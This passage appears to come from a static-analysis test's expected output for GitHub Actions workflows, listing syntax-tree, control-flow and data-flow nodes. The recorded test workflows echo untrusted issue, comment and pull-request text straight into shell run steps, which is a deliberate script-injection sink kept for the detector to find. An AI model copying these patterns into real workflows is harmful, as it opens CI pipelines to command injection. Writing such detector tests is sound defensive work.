| LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
-| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 
| LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | 
ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| 
.github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | 
on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| 
.github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step 
| -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
-dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ 
